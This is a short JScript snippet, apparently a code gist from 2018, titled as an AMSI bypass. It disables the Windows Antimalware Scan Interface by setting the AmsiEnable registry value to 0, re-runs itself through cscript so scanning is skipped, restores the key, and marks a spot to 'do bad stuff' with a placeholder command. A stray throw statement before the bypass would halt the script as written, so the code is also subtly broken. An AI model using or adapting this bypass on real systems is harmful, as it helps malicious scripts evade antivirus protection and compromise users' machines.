Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
sh.RegWrite(key, 1, "REG_DWORD"); // put it back
// do bad stuff below
sh.Run("cmd.exe /k echo AMSI bypassed :)")
